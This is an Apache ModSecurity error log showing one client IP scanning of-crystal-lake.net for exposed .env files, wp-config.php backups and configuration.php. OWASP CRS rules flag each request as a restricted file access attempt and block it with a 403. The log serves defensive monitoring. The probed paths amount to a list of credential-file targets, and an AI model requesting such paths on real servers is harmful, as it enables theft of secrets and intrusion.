[Tue May 12 02:41:27.468581 2026] [security2:error] [pid 1691274:tid 1691285] [client 93.123.109.165:4274] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.development"] [unique_id "agJ3N1fdQaraX_prmqcelgAAAAg"]
[Tue May 12 02:41:27.469990 2026] [security2:error] [pid 1691274:tid 1691289] [client 93.123.109.165:4236] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.bak"] [unique_id "agJ3N1fdQaraX_prmqcelwAAAAw"]
[Tue May 12 02:41:27.470106 2026] [security2:error] [pid 1691274:tid 1691289] [client 93.123.109.165:4236] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.bak"] [unique_id "agJ3N1fdQaraX_prmqcelwAAAAw"]
[Tue May 12 02:41:27.470525 2026] [security2:error] [pid 1691274:tid 1691289] [client 93.123.109.165:4236] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.bak"] [unique_id "agJ3N1fdQaraX_prmqcelwAAAAw"]
[Tue May 12 02:41:27.471520 2026] [security2:error] [pid 1707624:tid 1707697] [client 93.123.109.165:4240] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.save"] [unique_id "agJ3N7OxS7i6i_mT2NLHqAAAAE8"]
[Tue May 12 02:41:27.471636 2026] [security2:error] [pid 1707624:tid 1707697] [client 93.123.109.165:4240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.save"] [unique_id "agJ3N7OxS7i6i_mT2NLHqAAAAE8"]
[Tue May 12 02:41:27.471841 2026] [security2:error] [pid 1707624:tid 1707697] [client 93.123.109.165:4240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.save"] [unique_id "agJ3N7OxS7i6i_mT2NLHqAAAAE8"]
[Tue May 12 02:41:27.472695 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env.old"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P0gAAAUA"]
[Tue May 12 02:41:27.472807 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env.old"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P0gAAAUA"]
[Tue May 12 02:41:27.473042 2026] [security2:error] [pid 1730207:tid 1730209] [client 93.123.109.165:4184] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env.old"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P0gAAAUA"]
[Tue May 12 02:41:27.475514 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.bak"] [unique_id "agJ3N1fdQaraX_prmqcemAAAABI"]
[Tue May 12 02:41:27.475536 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php"] [unique_id "agJ3N7OxS7i6i_mT2NLHqQAAAEk"]
[Tue May 12 02:41:27.475632 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.bak"] [unique_id "agJ3N1fdQaraX_prmqcemAAAABI"]
[Tue May 12 02:41:27.475645 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php"] [unique_id "agJ3N7OxS7i6i_mT2NLHqQAAAEk"]
[Tue May 12 02:41:27.475866 2026] [security2:error] [pid 1691274:tid 1691294] [client 93.123.109.165:4198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php.bak"] [unique_id "agJ3N1fdQaraX_prmqcemAAAABI"]
[Tue May 12 02:41:27.475877 2026] [security2:error] [pid 1707624:tid 1707691] [client 93.123.109.165:4312] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php"] [unique_id "agJ3N7OxS7i6i_mT2NLHqQAAAEk"]
[Tue May 12 02:41:27.475956 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php~"] [unique_id "agJ3N3o6NvB9WXx5V-55dAAAAQE"]
[Tue May 12 02:41:27.475991 2026] [:error] [pid 1707624:tid 1707703] [client 93.123.109.165:4156] File does not exist: /home/ofcrysta/public_html/configuration.php
[Tue May 12 02:41:27.476063 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php~"] [unique_id "agJ3N3o6NvB9WXx5V-55dAAAAQE"]
[Tue May 12 02:41:27.476252 2026] [security2:error] [pid 1730175:tid 1730178] [client 93.123.109.165:4200] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/wp-config.php~"] [unique_id "agJ3N3o6NvB9WXx5V-55dAAAAQE"]
[Tue May 12 02:41:27.476360 2026] [security2:error] [pid 1709071:tid 1709092] [client 93.123.109.165:4264] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/.env~"] [unique_id "agJ3N7vMumyrWMfSu7qpNAAAAMU"]
[Tue May 12 02:41:27.476486 2026] [security2:error] [pid 1709071:tid 1709092] [client 93.123.109.165:4264] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/.env~"] [unique_id "agJ3N7vMumyrWMfSu7qpNAAAAMU"]
[Tue May 12 02:41:27.476670 2026] [security2:error] [pid 1709071:tid 1709092] [client 93.123.109.165:4264] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/.env~"] [unique_id "agJ3N7vMumyrWMfSu7qpNAAAAMU"]
[Tue May 12 02:41:27.477995 2026] [security2:error] [pid 1709071:tid 1709087] [client 93.123.109.165:4288] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/app/.env"] [unique_id "agJ3N7vMumyrWMfSu7qpNQAAAMA"]
[Tue May 12 02:41:27.478110 2026] [security2:error] [pid 1709071:tid 1709087] [client 93.123.109.165:4288] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/app/.env"] [unique_id "agJ3N7vMumyrWMfSu7qpNQAAAMA"]
[Tue May 12 02:41:27.478329 2026] [security2:error] [pid 1709071:tid 1709087] [client 93.123.109.165:4288] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/app/.env"] [unique_id "agJ3N7vMumyrWMfSu7qpNQAAAMA"]
[Tue May 12 02:41:27.478600 2026] [security2:error] [pid 1695975:tid 1695995] [client 93.123.109.165:4296] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/backend/.env"] [unique_id "agJ3N9VI9ymHBxup74-LogAAAJE"]
[Tue May 12 02:41:27.478716 2026] [security2:error] [pid 1695975:tid 1695995] [client 93.123.109.165:4296] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/backend/.env"] [unique_id "agJ3N9VI9ymHBxup74-LogAAAJE"]
[Tue May 12 02:41:27.478909 2026] [security2:error] [pid 1695975:tid 1695995] [client 93.123.109.165:4296] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/backend/.env"] [unique_id "agJ3N9VI9ymHBxup74-LogAAAJE"]
[Tue May 12 02:41:27.480292 2026] [security2:error] [pid 1695975:tid 1695993] [client 93.123.109.165:4248] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /storage/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/storage/.env"] [unique_id "agJ3N9VI9ymHBxup74-LowAAAI8"]
[Tue May 12 02:41:27.480424 2026] [security2:error] [pid 1695975:tid 1695993] [client 93.123.109.165:4248] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/storage/.env"] [unique_id "agJ3N9VI9ymHBxup74-LowAAAI8"]
[Tue May 12 02:41:27.480593 2026] [security2:error] [pid 1695975:tid 1695984] [client 93.123.109.165:4224] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/local/.env"] [unique_id "agJ3N9VI9ymHBxup74-LpAAAAIY"]
[Tue May 12 02:41:27.480614 2026] [security2:error] [pid 1695975:tid 1695993] [client 93.123.109.165:4248] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/storage/.env"] [unique_id "agJ3N9VI9ymHBxup74-LowAAAI8"]
[Tue May 12 02:41:27.480709 2026] [security2:error] [pid 1695975:tid 1695984] [client 93.123.109.165:4224] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/local/.env"] [unique_id "agJ3N9VI9ymHBxup74-LpAAAAIY"]
[Tue May 12 02:41:27.480921 2026] [security2:error] [pid 1695975:tid 1695984] [client 93.123.109.165:4224] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/local/.env"] [unique_id "agJ3N9VI9ymHBxup74-LpAAAAIY"]
[Tue May 12 02:41:27.482881 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:4174] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJ3N3o6NvB9WXx5V-55dgAAAQU"]
[Tue May 12 02:41:27.482999 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:4174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJ3N3o6NvB9WXx5V-55dgAAAQU"]
[Tue May 12 02:41:27.483187 2026] [security2:error] [pid 1730175:tid 1730182] [client 93.123.109.165:4174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "of-crystal-lake.net"] [uri "/api/.env"] [unique_id "agJ3N3o6NvB9WXx5V-55dgAAAQU"]
[Tue May 12 02:41:27.483881 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:4162] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "of-crystal-lake.net"] [uri "/config/.env"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P0wAAAUs"]
[Tue May 12 02:41:27.484001 2026] [security2:error] [pid 1730207:tid 1730220] [client 93.123.109.165:4162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "of-crystal-lake.net"] [uri "/config/.env"] [unique_id "agJ3Nzue9Sp-pIv_Bb6P0wAAAUs"]
